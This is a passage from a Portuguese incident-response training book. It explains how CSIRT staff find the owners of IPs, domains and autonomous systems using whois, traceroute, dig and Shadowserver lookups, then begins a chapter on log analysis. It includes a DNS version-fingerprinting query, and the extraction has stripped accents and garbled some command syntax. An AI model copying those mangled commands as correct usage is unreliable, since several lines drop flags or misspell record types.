% de consultas so: dominio (.br), titular (entidade),
% ticket, provedor, contato (ID), blow CIDR, IP e ASN.
Na fgura, ilustrado o resultado de uma pesquisa pelo IP 200.130.35.4.
q As seguintes informaes podem ser identifcadas:
1 Bloco de endereamento: 200.130/16. Ou seja, o responsvel pelo endereo
200.130.35.4 tambm responsvel por todos os endereos do bloco totalizando
65534 IPs;
1 Servidores DNS: lua.na-df.rnp.br, teyr.na-cp.rnp.br, bellana.nc-rj.rnp.br;
1 Contato tcnico: registro@rnp.br;
1 Pas de alocao: BR Brasil;
1 Contato de segurana: cais@cais.rnp.br.
De posse dessas informaes, a equipe do CSIRT pode contatar os responsveis por um
endereo IP identifcado em um determinado incidente. O CSIRT deve priorizar as informaes
de contato de IPs frente as informaes providas pelos domnios de rede. Lembrando que as
informaes de domnios so mutveis, ou seja, no momento da ocorrncia de um incidente,
um domnio pode corresponder a um IP e no momento seguinte pode ser designado a outro IP.
Exerccio de fixao
Consulte a base de dados WHOIS usando sua ferramenta de preferncia (sistema ou ferra-
menta online) e complete a tabela a seguir:
1 Certifque-se de que os contatos esto corretos;
1 Identifque o pas de alocao do IP;
1 Identifque o CSIRT de coordenao.
IP Contato Contato correto Pas CSIRT de coordenao
218.234.18.106 abuse@hanaro.com
71.240.222.159 abuse@verizon.net
200.204.153.97 security@telesp.net.br
84.63.113.123 abuse@arcor-ip.de
143.54.1.20 tri@ufrgs.br
196.216.2.136 abuse@godaddy.com
Figura 6.2
Consultando
informaes de
endereamento IP
via interface web do
Registro.br.
119

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
Muitas vezes, a identifcao dos contatos direta e os e-mails dos responsveis podem
ser facilmente identifcados. Em outros casos, no entanto, necessrio utilizar dife-
rentes mtodos e meios de conseguir um contato funcional para reportar um incidente.
Na sequncia, alguns mtodos so descritos.
Recursos adicionais
Como exemplifcado, os diferentes recursos de internet podem apresentar responsveis
distintos. Um domnio de rede (www.exemplo.com.br) possui informaes de contato que
geralmente so diferentes do respectivo endereo IP associado.
Muitas vezes, mesmo utilizando os diferentes contatos identifcados via WHOIS, no se
obtm um resultado satisfatrio. Logo, as informaes providas no sistema de WHOIS, como
demonstrado anteriormente, podem ser utilizadas como ponto de partida para contatar
os responsveis. No entanto, nem sempre essas informaes esto disponveis ou esto
desatualizadas. Nesses casos, onde no se tm um contato funcional, o CSIRT deve usar
diferentes mtodos e meios de comunicar as partes envolvidas.
Infelizmente no existe uma maneira padro de contatar uma instituio. De fato, existem
alguns esforos que visam padronizar a forma de contatar instituies relativas a ques-
tes de segurana e administrao de redes. Um dos esforos descrito na RFC 2142, que
recomenda endereos de e-mail comuns que cada instituio deveria ter para facilitar o
contato, tal como os e-mails security@<dominio> ou csirt@<dominio>, para contato de
segurana. No entanto, essa boa prtica de confgurao no implementada globalmente
pelas instituies, por diversos fatores, como por exemplo o grande volume de spam rece-
bido por essas contas ou, ainda, por desconhecimento dos administradores. Sendo assim,
fundamental que a equipe de um CSIRT seja apta a utilizar diferentes tcnicas e ferramentas
adicionais para complementar a investigao dos responsveis por recursos de rede.
q Na sequncia so apresentadas algumas ferramentas e tambm alguns servios publica-
mente disponveis para consulta de dados.
Ferramentas
Existe um conjunto de ferramentas que podem ser utilizadas para obter informaes de um
determinado IP ou domnio envolvido com incidentes. Algumas ferramentas so amplamente
utilizadas pela equipe do CSIRT para investigar a conectividade e acessibilidade de sistemas.
No entanto, as mesmas ferramentas podem ser utilizadas no contexto da resposta a incidentes,
mais especifcamente na identifcao de responsveis por recursos de rede. Entre elas:
q traceroute
traceroute <endereo>
O comando traceroute ou o seu equivalente em sistemas Windows, tracert exibe todos
os hosts intermedirios entre a mquina onde o comando executado at o endereo
destino. De uma forma geral, o comando traceroute pode ser utilizado para identifcar a
rota por onde o fuxo de pacotes encaminhado. No processo de resposta a incidentes,
a rota por onde o fuxo de pacotes encaminhado pode revelar informaes de contato
de um determinado IP suspeito, entre elas:
1 Identifcar o provedor de acesso (ISP): os hosts intermedirios podem identifcar
dados do provedor de acesso ou provedor de contedo utilizado pelo IP suspeito.
Nesses casos, onde o contato do IP suspeito no est acessvel, pode-se contatar o
provedor para obter mais informaes ou ainda solicitar que uma notifcao seja
encaminha ao cliente;
120

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Identifcar o CERT: assim como o provedor, o nome dos hosts intermedirios
(reverso) pode revelar qual o pas onde o IP suspeito est localizado. Com isso,
pode-se solicitar auxlio para um CSIRT nacional para que contatos mais especfcos
sejam ativados.
A fgura 6.3 ilustra o resultado do comando traceroute usando um IP arbitrrio e como as
informaes podem ser teis para identifcar responsveis por um endereamento.
$ traceroute 143.54.1.20
traceroute to 143.54.1.20 (143.54.1.20), 30 hops max, 60 byte packets
1 10.0.0.1 (10.0.0.1) 1.165 ms 2.219 ms 2.817 ms
2 200.150.185.1 (200.150.185.1) 12.053 ms 14.801 ms 15.101 ms
3 200-170-105-65.user.ajato.com.br (200.170.105.65) 15.578 ms
15.933 ms 21.064 ms
4 200.170.100.2 (200.170.100.2) 35.531 ms 35.983 ms 36.210 ms
5 200-170-96-193.spo.vaughan.ajato.com.br (200.170.96.193) 39.090
ms 39.667 ms 40.549 ms
6 as1916.sp.ptt.br (187.16.216.4) 39.367 ms 9.693 ms 13.778 ms
7 sp-sc-10g-oi.bkb.rnp.br (200.143.252.66) 44.136 ms 44.117 ms
sp-pr-10g-oi.bkb.rnp.br (20 0.143.252.62) 16.844 ms
8 sc-rs-10g-oi.bkb.rnp.br (200.143.252.57) 34.298 ms 34.280 ms
pr-rs-10g-oi.bkb.rnp.br (20 0.143.252.53) 35.368 ms
9 200.143.255.162 (200.143.255.162) 32.738 ms 33.202 ms 34.432 ms
10 ufrgs-ve-40-mlx4.tche.br (200.19.240.14) 39.066 ms 39.032 ms 39.007 ms
11 lfs-in.ufrgs.br (143.54.0.241) 38.994 ms 39.293 ms 39.219 ms
12 penta.ufrgs.br (143.54.1.20) 31.745 ms 30.333 ms 36.441 ms
No exemplo citado, foi utilizado um IP arbitrrio 143.54.1.20 como exemplo. Cada linha
representa um host intermedirio por onde o fuxo de pacotes passou para atingir o alvo.
Como pode ser observado, o alvo (143.54.1.20) possui 12 hosts intermedirios a partir da
mquina em que o comando foi executado. Na maioria dos casos, os reversos dos hosts
intermedirios revelam dados do provedor e localizao; nas linhas 3-5 possvel inferir que
o pacote passou pelo backbone da operadora ajato.com.br. Na sequncia, o pacote entra
no ponto de troca de trfego (sp.ptt.br) e acessa o backbone da RNP. Como destino, o pacote
chega rede da Universidade Federal do Rio Grande do Sul.
q Nesse exemplo da fgura, as seguintes informaes podem ser utilizadas para tentar
encontrar os responsveis pelo IP suspeito:
1 Provedor de trnsito do IP suspeito a RNP: sendo assim, uma notifcao poderia
ser enviada para os contatos de segurana da RNP;
1 O IP est localizado na infraestrutura da Universidade Federal do Rio Grande do Sul: a
universidade possui um CSIRT prprio o qual poderia ser contatado para investigar o
possvel incidente.
Dig
Dig uma ferramenta via linha utilizada para consultar servidor de nomes (DNS). O Dig
muito verstil e consegue obter diversas informaes sobre recursos de rede permitindo
diferentes tipos de consultas, tais como:
1 A (endereo de rede);
1 ANY (todas as informaes disponveis);
Figura 6.3
Traceroute: hosts
intermedirios
at o destino
143.54.1.20.
121

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
q 1 MX (servidores de e-mails);
1 NS (servidores de nomes DNS);
1 SOA (Start of Authority Record);
1 HINFO (informaes do host);
1 AXFR (transferncia de zona).
Por padro, a consulta bsica realizada uma pergunta pelo tipo A (Address), ou seja, o ende-
reo IP associado ao domnio requisitado. Os outros tipos de consultas devem ser especifcados.
q Como por exemplo, para consultar todos os servidores de e-mails associados a um
determinado domnio, utilizando o comando a seguir:
$ dig domnio MX
O reverso tambm pode ser consultado usando o comando dig. Para requisitar uma
consulta reversa IP para domnio , o seguinte comando pode ser utilizado:
$ dig x IP +short
Da mesma forma, a ferramenta permite identifcar a verso de um determinado servidor
de DNS:
19. $ dig @server version.bind text chaos
A ferramenta Dig utiliza por padro o servidor DNS da prpria rede para consultar infor-
maes; no entanto, esse comportamento pode ser alterado. Na consulta a seguir, por
exemplo, especifcado via parmetro um servidor de DNS. No comando exemplifcado
a seguir o servidor de DNS 8.8.8.8 servidor DNS pblico do Google utilizada para
resolver o nome www.rnp.br.
20. $ dig @8.8.8.8 www.rnp.br
Outro tipo de pesquisa que pode ser til no contexto de localizao de contatos a con-
sulta por registros do tipo SOA. Para cada domnio DNS existe um tipo especial de registro
denominado SOA (Start of Authority). O registro SOA possui um campo com informaes
de contato onde um endereo de e-mail fornecido. Essas informaes podem ser obtidas
utilizando as ferramentas tradicionais de busca por nomes: dig, host e ferramentas web.
q
Uma consulta por registro do tipo SOA, usando o comando dig, exemplifcado a seguir:
$ dig rnp.br soa +short
teyr.na-cp.rnp.br. sti.rnp.br. 2013111402 10800 3600 604800 86400
q Como resultado, a consulta ao domnio rnp.br apresentado na fgura teve como
resposta os seguintes valores:
1 teyr.na-cp.rnp.br: servidor primrio da zona rnp.br;
1 sti.rnp.br: um endereo de e-mail de contato. Em vez do formato tradicional
usurio@domnio, esse campo deve ser traduzido para sti@rnp.br;
1 2013111402: nmero serial da zona do DNS;
1 10800: taxa de atualizao (3h);
1 3600: tempo entre realizar uma nova transferncia (60 minutos);
1 604800: expirao da zona 7 dias;
1 86400: mnimo (1 dia).
Logo, o contato de e-mail identifcado pode ser mais uma forma de contatar os responsveis
Figura 6.4
consulta por
informaes do
registro SOA.
122

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
por um determinado endereo suspeito.
Exerccio de fixao e
utilizando a ferramenta DIG
Utilize o comando dig para consultar dois servidores de nomes diferentes e resposta s per-
guntas a seguir: resolva o nome www.caixa.gov.br usando dois servidores pblicos.
a. Que comandos foram utilizados?
b. Qual a verso de software dos servidores DNS utilizados?
c. As duas consultas retornam o mesmo resultado para o nome www.caixa.gov.br? Em
caso negativo, o que pode ter acontecido?
Mapeando IP para AS
q Outra forma de obter mais informaes sobre uma instituio consultar informaes
sobre o Sistema Autnomo Autonomous System (AS) associado a um determinado
endereo IP.
Como comentado, uma instituio pode ser identifcada por diferentes meios. Alm das
maneiras descritas anteriormente tal como domnios de redes e endereamento IP ,
dados de roteamento tambm podem ser utilizados.
Tipicamente, instituies de grande e mdio porte possuem autonomia para gerenciar
questes relativas s polticas de roteamento. Nesse contexto, uma instituio pode ser
identifcada por um nmero de identifcao utilizado para fns de roteamento. Esse nmero
de identifcao denominado nmero AS, ou nmero de identifcao do sistema aut-
nomo. De forma resumida, um AS especifca uma coleo de blocos de endereamento IP
que foram designados para um provedor de internet.
q Portanto, identifcar um sistema autnomo de uma instituio permite determinar o
endereamento de redes de sua responsabilidade e, consequentemente, os contatos
para que as notifcaes sejam enviadas.
Para isso, um CSIRT pode consultar informaes de roteamento disponvel na internet e
identifcar um determinado AS.
Diante disso, alguns grupos disponibilizam bases de informaes desenvolvidas especifca-
123

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
mente para consultar informaes de roteamento.
q Uma delas mantida pelo grupo de pesquisa Shadownserver:
https://www.shadowserver.org/
q O servio provido pelo Shadownserver, que pode ser consultado via interface WHOIS,
fornece um conjunto de informaes, entre elas:
1 Descrio do ASN;
1 Pas de alocao do ASN;
1 Prefxo BGP;
1 Data de alocao do ASN.
Na sequncia, so demonstrados alguns exemplos que ilustram a utilizao do servio
de WHOIS provido pelo Shadownserver com informaes relativas a roteamento.
Por exemplo:
q Localizando informaes de roteamento da Rede Nacional de Pesquisa/RNP.
Como base para consulta, ser utilizado o site http://www.rnp.br/. Logo, faz-se necessrio
as seguintes etapas:
a. converter domnio para endereo IP
$ host www.rnp.br
www.rnp.br has address 200.130.35.4
b. consultar a base de dados shadowserver.org
2. $ whois -h asn.shadowserver.org origin 200.130.35.4
3. 1916 | 200.130.0.0/16 | Associao | BR | RNP.BR | ASSOCIACAO
REDE NACIONAL DE ENSINO E PESQUISA
Como resultado, possvel observar que o IP 200.130.35.4 pertence ao AS 1916 e faz
parte do bloco de endereamento 200.130.0.0/16 alocado no Brasil (BR).
De forma similar, pode ser realizada uma consulta por todos os endereos pertencentes
a um determinado AS. No exemplo a seguir realizado uma consulta por todos os blocos
alocados ao provedor da RNP:
124

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
user@server > whois -h asn.shadowserver.org 'prefix 1916'
150.161.0.0/16
150.164.0.0/16
200.17.0.0/20
200.17.25.0/24
200.17.48.0/20
200.17.64.0/20
200.17.112.0/20
200.17.128.0/20
200.17.176.0/20
200.18.128.0/20
200.18.144.0/20
200.18.160.0/20
200.18.176.0/20
200.18.192.0/19
200.19.40.0/23
200.19.112.0/20
200.19.128.0/20
200.19.144.0/20
<...>
Como pudemos observar, o AS possui inmeros blocos de endereamento associados.
Diante disso, possvel estimar o tamanho de um provedor e suas caractersticas de rotea-
mento. De forma indireta, essas informaes servem para complementar as informaes
dos responsveis por um determinado incidente (nome do provedor etc.).
Exerccio de fixao e
Sistemas Autnomos
Com base nas informaes disponibilizadas pelo site [1], responda as seguintes questes.
[1] http://bgp.he.net/
a. Identifque qual o seu AS neste momento.
b. Quantos ASs so esto sendo anunciados no Brasil?
Figura 6.5
Blocos de
endereamento
associados ao AS
1916 (RNP).
125

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
c. Identifque quantos prefxos IPv4/IPv6 esto sendo anunciados pelo Brasil.
Demais recursos
Mesmo assim, ainda existem casos em que no possvel determinar os contatos apro-
priados por um determinado recurso.
q Diante disso, o CSIRT deve recorrer a meios alternativos que podem ser empregados
para auxiliar, de forma indireta, nesta tarefa de identifcar os devidos responsveis.
Por exemplo:
1 Utilizar informaes contidas nos website (contatos);
1 Listas de discusses tcnicas (maillist);
1 Redes sociais.
Um recurso que pode ser til para comunicar-se com uma instituio envolvida com um
incidente usar as informaes contidas no prprio website da instituio.
Por exemplo, pode-se acessar o website domnio ou endereo IP:80 e buscar por formas
alternativas de contato. Algumas instituies disponibilizam formulrios em seus sites para
contato com os clientes. Esses formulrios podem ser uma alternativa para contatar os res-
ponsveis pela segurana de uma instituio. A fgura 6.5, por exemplo, ilustra uma seo
de um website com um formulrio para contato.
Figura 6.6
Formulrio
de contato.
126

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q No bastando, um CSIRT pode utilizar recursos como fruns tcnicos e listas de
discusses (malling list) para localizar informaes de contato da equipe tcnica de
uma determinada instituio.
Boa parte de listas tcnicas disponibilizam o arquivo de conversas de forma pblica, o qual
pode ser consultado. Logo, possvel buscar informaes por um determinado IP ou domnio
no arquivo dessas listas, de modo a obter mais informaes dos responsveis.
q No Brasil, existe uma lista de discusso tcnica denominada Grupo de Trabalho de
Engenharia e Operao de Redes utilizada por administradores de sistemas e pro-
vedores de acesso. A lista mantida pelo NIC.br e tem o seu histrico publicamente
acessvel no seguinte endereo: http://eng.registro.br/pipermail/gter/
Essa lista pode ser usada para obter contatos ou, at mesmo, como ponto de partida para
localizar responsveis por determinada redes. Alm da lista GTER, existem diversas listas de
discusses tcnicas que podem ser utilizadas para consulta (NANOG, LACNOG etc.).
Tambm possvel consultar informaes de um determinado recurso em
mecanismos de buscas e at mesmo em redes sociais. Por exemplo, servios de
microblog-ging, tal como Twitter, pode ser utilizado para contatar uma instituio e
solicitar os seus contatos tcnicos.
De forma resumida, as tcnicas e ferramentas apresentadas neste captulo buscam dar
alternativas para identifcar responsveis por recursos de rede. Em certas situaes, mesmo
utilizando diferentes fontes de informaes, no possvel identifcar o contato dos respon-
sveis. Como alternativa, pode-se contatar o provedor de acesso solicitando informaes do
contato desejado ou, ainda, que a prpria notifcao seja repassada para os responsveis.
Adicionalmente, existem CSIRTs regionais e nacionais que podem prover contatos mais
especfcos quando necessrio, mesmo que essas informaes no sejam da constituinte do
prprio CSIRT. Por exemplo, o CSIRT nacional pode ter informaes de contatos de outros
pases, mesmo tendo sua rea de atuao apenas no Brasil.
q Cuidados no processo de identifcao de contato
1 As informaes de roteamento so ativas: a ferramenta traceroute pode identifcar o
caminho da comunicao at o destino; no entanto, essas informaes so dinmicas e
em uma anlise ps-incidentes podem no refetir a realidade no momento do incidente;
1 As informaes de resoluo de nomes (DNS) so dinmicas. Um determinado
domnio pode ser traduzido para um endereo IP; no entanto, no existe garantia de
que essa informao ser inalterada. Em anlises ps-incidentes, da mesma forma,
um domnio de rede pode conter informaes que no mais refetem a realidade no
momento do incidente;
1 O contato identifcado na base WHOIS deve ser sempre analisado com critrio, sobre-
tudo quando se utiliza ferramentas automatizadas para extrair informaes. Algumas
informaes podem ser imprecisas, ou ainda, podem fazer com que as notifcaes
sejam enviadas para os prprios atacantes.
127

C
a
p

t
u
l
o


6

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
Leitura recomendada:
1 Mailbox Names for Common Services, Roles and Functions:
http://www.ietf.org/rfc/rfc2142.txt
1 Regional Internet Registries: https://www.arin.net/knowledge/rirs/countries.html
1 Internet Corporation for Assigned Names and Numbers ICANN: https://www.icann.org/
1 RFC 2821 Simple Mail Transfer Protocol: www.ietf.org/rfc/rfc2821.txt
1 RFC 2476 Message Submission: http://www.ietf.org/rfc/rfc2476.txt
128

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
129

C
a
p

t
u
l
o


6

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

6

Roteiro de atividades 6
Atividade 6.1 Dados sensveis
Responda s seguintes questes relacionadas com o tema: gerenciamento de dados sensveis.
a. Voc concorda com a ideia de enviar cpias dos incidentes para esses CSIRTs de coordenao?
b. Voc acredita que qualquer tipo de incidente deve ser compartilhado com os CSIRTs
de coordenao?
c. Que cuidados devem ser tomados para que um CSIRT de coordenao de outro pas
entenda a sua notifcao?
Atividade 6.2 Investigao de incidentes
Voc identifcou uma atividade suspeita de um host em particular. Voc considera importante
realizar varreduras (scan) para o IP suspeito a fm obter mais informaes sobre o atacante?
130

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atividade 6.3 Investigao de contatos
Considerando todas as metodologias estudadas neste captulo, investigue todos os contatos
ou responsveis para as redes a seguir. Considere informaes de domnio, endereamento
IP, informaes contidas em website e dados de roteamento. Quem o responsvel tcnico?
um endereo institucional ou pessoal?
a. www.ac.gov.br
b. presidencia.gov.br
131

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
7
Anlise de Logs
Conhecer a estrutura bsica de sistemas de logs; Levantar questes relacionadas com
o processo de reportar incidentes; Analisar mensagens de logs.
Infraestrutura de coleta e armazenamento de mensagens de logs; Processamento
e interpretao de mensagens de logs; Correlacionar informaes de mltiplos sistemas.

Introduo
q Os logs so importantes fontes de informaes para o gerenciamento de recursos de
sistemas computacionais. Os logs descrevem eventos registrados por dispositivos ou
aplicaes, podendo conter diferentes nveis de detalhamento de informaes. As infor-
maes contidas nos logs podem ser usadas em diversas etapas do gerenciamento de
sistemas, tais como:
1 Auditoria;
1 Depurao;
1 Estatsticas;
1 Proviso de recursos;
1 Identifcao de falhas de hardware;
1 Investigao de incidentes de segurana;
1 Deteco de anomalias e possveis ataques.
Geralmente os logs podem ser utilizados para responder questes relacionadas a eventos
que j aconteceram, tal como: identifcar tentativas de acesso sem sucesso, instante em
que o sistema sofreu instabilidade, e informar que sistema de arquivo est sobrecarregado.
No entanto, os logs podem ser usados no apenas para revelar informaes passadas,
mas sim para identifcar possveis falhas em um futuro prximo. Por exemplo, informaes
que relatam constantes falhas na escrita de dados de um determinado disco rgido pode
representar uma provvel falha no disco. Em questes relacionadas com segurana, os logs
podem identifcar que aplicaes esto sendo exploradas, permitindo equipe avaliar se as
suas protees de segurana so adequadas.
Logs tambm podem ser analisados para produzir relatrios que demonstram o comporta-
mento de usurios, os quais podem ser utilizados para marketing, desenvolvimento de pro-
dutos e detectar comportamento anormal que podem indicar possveis ataques. De forma
complementar, os logs podem satisfazer requerimentos de autoria de um sistema e indicar
os responsveis por aes realizadas.
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
132

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
No entanto, identifcar informaes relevantes em um arquivo de log pode levar tempo e
muito trabalho, principalmente em sistemas complexos com um grande volume de informa-
es que devem ser analisadas. Logo, faz-se necessrio entender as caractersticas bsicas
contidas nas mensagens de logs para que informaes relevantes sejam facilmente identi-
fcadas. Estar familiarizado com os diferentes formatos de logs fundamental para que o
CSIRT possa atuar efetivamente no processo de resposta a incidentes. Da mesma forma, o
entendimento do funcionamento geral do sistema de logs permite identifcar erros e, adi-
cionalmente, auxiliar na identifcao de informaes relevantes em arquivos de logs com
formatos ainda no conhecidos.
Este captulo est organizado em duas etapas. A primeira etapa descreve as caractersticas
bsicas do sistema de registro de eventos (logs) descrevendo: a) os diferentes tipos de
informaes que podem ser encontradas nos arquivos de logs; b) formatos de arquivos, e
c) infraestruturas de coleta e transmisso de informaes de eventos. J na segunda etapa,
so abordadas diferentes maneiras de analisar os arquivos de logs, descrevendo ferra-
mentas e tcnicas utilizadas.
Mensagens de logs
q Uma mensagem de log um conjunto de informaes geradas por algum dispositivo ou
sistema que denota a ocorrncia de um evento.
O conjunto de informaes contidas em um arquivo de log dependente do tipo de sistema
que est gerando os eventos. Por exemplo, mensagens de logs de um servidor web contm
informaes especfcas sobre o prprio servio: arquivos acessados, pginas no encon-
tradas, requisies HTML, status do servio web, entre outros. Por outro lado, logs de um
roteador contm dados de protocolos e informaes do prprio Sistema Operacional do
roteador (carga, status das interfaces e taxa de utilizao das interfaces).
q Existe uma grande quantidade de dispositivos e sistemas que podem ser confgurados
para registrar informaes de eventos, tais como:
1 Impressoras;
1 Sistemas de antivrus;
1 Servidores Unix/Windows;
1 VPN (redes virtuais privadas);
1 Roteadores, frewalls e switches;
1 NAT (servio de traduo de nomes);
1 Aplicaes (servios de rede, servios web e softwares em geral);
1 Equipamento de controle de acesso fsico (leitores biomtricos e catracas).
De fato, a heterogeneidade dos dispositivos e sistemas faz com que a natureza das mensa-
gens de logs seja bastante diversifcada. Algumas mensagens com maior nvel de detalha-
mento de informao e outras com menos.
q Mesmo com a grande variabilidade de informaes que podem ser originadas pelos
dispositivos, podem-se agrupar as informaes em certas categorias tendo em vista a
natureza da prpria mensagem:
1 Gerncia de mudana: informaes de troca de confgurao, atualizao de compo-
nentes e mudanas de contas de usurios. Essa categoria engloba todos os recursos
que podem ser atualizados, adicionais, ou removidos;
133

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
q 1 Autenticao e autorizao: mensagens relativas autenticao de usurios nos
diversos sistemas e autorizao de acesso a recursos privilegiados. Por exemplo,
acessos do usurio root; e tentativas de obter acesso via comando sudo;
1 Acesso a dados e sistema: registro de eventos associados ao acesso de compo-
nentes de aplicaes, incluindo informaes de arquivos e banco de dados.
Os eventos dessa categoria geralmente descrevem informaes operacionais e de
desempenho, incluindo questes relativas segurana dos sistemas;
1 Ameaas: eventos gerados por dispositivos de rede que produzem mensagens de
alerta e demais atividades que violam as polticas de segurana da instituio.
Nessa categoria incluem mensagens originadas por frewalls e sistemas de deteco
de intruso;
1 Desempenho e capacidade: envolve mensagens relativas ao desempenho dos sis-
temas e gerenciamento de capacidades, tais como: utilizao de memria, utilizao
do espao em disco e carga do sistema;
1 Disponibilidade: informaes sobre a disponibilidade do recurso computacional.
Muitos dispositivos registram eventos quando um sistema iniciado, reiniciado ou
desligado. Essas informaes so fundamentais para identifcar quanto tempo um
sistema fcou indisponvel ou ainda examinar quando uma interface de um roteador
est inoperante;
1 Diversas: mensagens genricas de notifcao que servem para chamar ateno de
um determinado evento confgurado pelo prprio desenvolvedor da aplicao.
Independentemente da natureza e do nvel de detalhamento das mensagens de logs, pos-
svel identifcar um conjunto bsico de informaes tipicamente presentes em boa parte
das mensagens. Identifcar esse conjunto bsico de informaes presentes nas mensagens
de logs determinante para que um CSIRT interprete corretamente o evento registrado.
q Os elementos essenciais de uma mensagem de log so:
1 Timestamp: tempo no qual o evento foi registrado pelo sistema de logs;
1 Origem: o sistema que originou a mensagem. Geralmente um endereo IP ou nome
de uma mquina;
1 Dados: informaes sobre o evento gerado, sendo dependente do objeto monitorado.
No existe um formato padronizado de informaes disponibilizadas por um evento,
podendo conter: dados de usurios, dados de aplicaes e recursos de sistemas.
A maneira exata com que as mensagens de logs so compostas depende do sistema origi-
nador de mensagens tipicamente uma aplicao e do nvel de detalhamento especifcado
pela confgurao da aplicao.
q Talvez o formato mais comum utilizado por sistemas de computadores e dispositivos
seja o formato baseado no Syslog (posteriormente descrito). A seguir uma mensagem de
log usando o formato Syslog:
1. Jan 28 11:42:59 sshd[1184]: server Accepted password for teste
from 10.10.10.10 port 6541 ssh2
Essa mensagem de log descreve um evento relacionado com o servio SSH. Como pode ser visu-
alizado, a mensagem pode ser dividida em quatro campos com informaes relativas ao evento:
134

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Jan 28 11:42:59 timestamp
sshd[1184] Nome do servio e nmero do processo em execuo no Sistema Operacional
server Nome do servidor onde o servio est sendo executado
Accepted pass...
Mensagem do servio SSH informando um acesso autorizado pelo usurio teste a partir
do IP 10.10.10.10 utilizando a porta origem 6541.
Assim como mensagens de logs baseados na especifcao Syslog, alguns sistemas imple-
mentam o seu prprio sistema de gerenciamento de logs. Por exemplo, o Windows XP e o
Windows 7 possuem um sistema de log denominado de Event Log. A fgura 7.1 ilustra o
visualizador de eventos do sistema Windows, onde possvel obter informaes de todos os
eventos relacionados a aplicaes, segurana e aos aplicativos.
q Portanto, importante observar que as mensagens de logs so dependentes funda-
mentalmente de dois fatores: aplicao (defne o contedo na mensagem) e tambm do
sistema utilizado para registrar as informaes (defne o formato e estrutura).
Alm de gerenciar os eventos gerados por um sistema de logs, alguns sistemas de gerencia-
mento de logs permitem priorizar certos tipos de eventos de logs. Dessa forma, informaes
crticas podem ser gerenciadas de diferentes maneiras das demais informaes. Isso essen-
cialmente til, sobretudo em sistemas onde existe um grande volume de informaes.
Utilizando a priorizao de eventos, torna-se vivel unifcar todos os eventos crticos do
sistema e das demais aplicaes sendo executadas. A priorizao de logs dependente do
sistema de logs utilizado; no entanto, boa parte deles possui uma taxonomia semelhante.
q A seguir um exemplo baseado em uma implementao do Syslog descrevendo
algumas categorias utilizadas:
1 Debug: mensagens de depurao so geradas por sistemas e aplicaes de maneira
a auxiliar desenvolvedores de softwares a identifcar problemas de execuo do pro-
grama. Sistemas confgurados para registrar eventos em modo debug produzem uma
grande quantidade de informao e com um grande nvel de detalhes;
Tabela 7.1
Alguns incidentes
e possveis
procedimentos.
Figura 7.1
Event Viewer:
gerenciamento
de eventos em
sistemas Windows.
135

C
a
p

t
u
l
o


7

-

I
d
e
n
t
i
f
c
a

o

d
e

c
o
n
t
a
t
o
s
q 1 Informational: so mensagens que so designadas para informar ao administrador
e usurios uma ao especfca. Por exemplo, alguns sistemas geram mensagens do
tipo informational quando um Sistema Operacional reiniciado. Embora o reincio de
um sistema seja uma ao normal, em certos contextos pode constituir uma exceo
de funcionamento ou uma violao de segurana;
1 Warning: mensagens que identifcam algumas excees na execuo, mas que no
impactam no funcionamento normal do sistema. Por exemplo, mensagens de log
informando que o sistema de arquivos est com pouco espao disponvel;
1 Error: mensagens de erro que representam falhas na execuo e afetam o funcio-
namento normal do sistema. Por exemplo, uma mensagem informando um erro de
sintaxe na execuo de um comando;
1 Alert: mensagem que contm informaes no usuais e potencialmente perigosas
para a execuo do sistema. Mensagens de alerta geralmente correspondem a
eventos de segurana. Por exemplo, um evento gerado por um sistema de deteco
de intruso, quando este identifca um comportamento possivelmente malicioso.
A fgura 7.2 ilustra as categorias descritas anteriormente no formato de uma pirmide. No
topo da pirmide esto as mensagens com maior severidade para o sistema, e na base
as mensagens com menor priorizao. Embora no seja uma regra, a base da pirmide
tambm o volume de mensagens tipicamente produzidas pelos sistemas: por exemplo, men-
sagens informacionais so mais encontradas do que mensagens do tipo erro.
mensagens de alerta
mensagens de erro
mensagens de aviso
mensagens informacionais
mensagens de depurao
alert
error
warning
informational
debug
Severidade
Sistemas de logs
q Os sistemas de logs sistemas de registros de eventos e notifcaes so compostos
por diferentes componentes bsicos responsveis por gerar, transmitir e armazenar
informaes de eventos.
Sendo assim, existe um conjunto de elementos que estabelecem uma infraestrutura de
modo a prover o efetivo funcionamento de um sistema de logs.
O funcionamento bsico de um sistema de log consiste em obter as mensagens geradas por
um evento e armazen-las em um sistema de arquivo para posterior anlise. De forma geral,
os arquivos de logs so armazenados localmente no servidor onde as aplicaes esto sendo
executadas. No entanto, armazenar os logs localmente podem trazer possveis pontos de inse-
gurana. Sabe-se que os sistemas falham, e em alguns incidentes nem sempre possvel ter
acesso ao sistema comprometido para analisar os logs. Alm do mais, uma vez que o sistema
esteja comprometido, o atacante pode utilizar ferramentas para apagar logs e evidncias de
